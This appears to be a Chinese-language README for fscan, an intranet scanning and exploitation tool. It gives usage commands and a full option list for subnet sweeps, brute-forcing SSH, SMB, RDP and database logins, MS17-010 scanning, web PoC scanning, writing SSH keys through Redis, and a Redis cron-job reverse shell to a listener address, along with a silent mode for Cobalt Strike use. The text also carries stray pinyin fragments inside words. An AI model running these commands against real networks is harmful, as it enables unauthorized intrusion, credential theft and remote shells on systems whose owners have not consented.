fscan內(nèi)網(wǎng)綜合掃描工具
fscan 是一款內(nèi)網(wǎng)綜合掃描工具,方便一鍵自動化、全方位漏掃掃描。
支持主機(jī)存活探測、端口掃描、常見服務(wù)的爆破、ms17010、redis批量寫公鑰、計(jì)劃任務(wù)反彈shell、讀取win網(wǎng)卡信息、web指紋識別、web漏洞掃描、netbios探測、域控識別等功能。
主要功能
1.信息搜集:
- 存活探測(icmp)
- 端口掃描
2.爆破功能:
- 各類服務(wù)爆破(ssh、smb、rdp等)
- 數(shù)據(jù)庫密碼爆破(mysql、mssql、redis、psql、oracle等)
3.系統(tǒng)信息、漏洞掃描:
- netbios探測、域控識別
- 獲取目標(biāo)網(wǎng)卡信息
- 高危漏洞掃描(ms17010等)
4.Web探測功能:
- webtitle探測
- web指紋識別(常見cms、oa框架等)
- web漏洞掃描(weblogic、st2等,支持xray的poc)
5.漏洞利用:
- redis寫公鑰或?qū)懹?jì)劃任務(wù)
- ssh命令執(zhí)行
6.其他功能:
- 文件保存
usege
簡單用法
fscan.exe -h 192.168.1.1/24 (默認(rèn)使用全部模塊)
fscan.exe -h 192.168.1.1/16 (B段掃描)
其他用法
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳過存活檢測 、不保存文件、跳過web poc掃描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 寫公鑰)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 計(jì)劃任務(wù)反彈shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令執(zhí)行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模塊ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加載指定文件的用戶名、密碼來進(jìn)行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定掃描結(jié)果保存路徑,默認(rèn)保存在當(dāng)前路徑)
fscan.exe -h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,方便快速查看網(wǎng)段信息 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密碼碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模塊)
fscan.exe -hf ip.txt (以文件導(dǎo)入)
fscan.exe -u http://baidu.com -proxy 8080 (掃描單個url,并設(shè)置http代理 http://127.0.0.1:8080)
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不進(jìn)行爆破,不掃Web poc,以減少流量)
fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基礎(chǔ)上,加入3389->rdp掃描)
編譯命令
go build -ldflags="-s -w " -trimpath
完整參數(shù)
-c string
ssh命令執(zhí)行
-cookie string
設(shè)置cookie
-debug int
多久沒響應(yīng),就打印當(dāng)前進(jìn)度(default 60)
-domain string
smb爆破模塊時,設(shè)置域名
-h string
目標(biāo)ip: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
-hf string
讀取文件中的目標(biāo)
-hn string
掃描時,要跳過的ip: -hn 192.168.1.1/24
-m string
設(shè)置掃描模式: -m ssh (default "all")
-no
掃描結(jié)果不保存到文件中
-nobr
跳過sql、ftp、ssh等的密碼爆破
-nopoc
跳過web poc掃描
-np
跳過存活探測
-num int
web poc 發(fā)包速率 (default 20)
-o string
掃描結(jié)果保存到哪 (default "result.txt")
-p string
設(shè)置掃描的端口: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")
-pa string
新增需要掃描的端口,-pa 3389 (會在原有端口列表基礎(chǔ)上,新增該端口)
-path string
fcgi、smb romote file path
-ping
使用ping代替icmp進(jìn)行存活探測
-pn string
掃描時要跳過的端口,as: -pn 445
-pocname string
指定web poc的模糊名字, -pocname weblogic
-proxy string
設(shè)置代理, -proxy http://127.0.0.1:8080
-user string
指定爆破時的用戶名
-userf string
指定爆破時的用戶名文件
-pwd string
指定爆破時的密碼
-pwdf string
指定爆破時的密碼文件
-rf string
指定redis寫公鑰用模塊的文件 (as: -rf id_rsa.pub)
-rs string
redis計(jì)劃任務(wù)反彈shell的ip端口 (as: -rs 192.168.1.1:6666)
-silent
靜默掃描,適合cs掃描時不回顯
-sshkey string
ssh連接時,指定ssh私鑰
-t int
掃描線程 (default 600)
-time int
端口掃描超時時間 (default 3)
-u string
指定Url掃描
-uf string
指定Url文件掃描
-wt int
web訪問超時時間 (default 5)
評論
圖片
表情
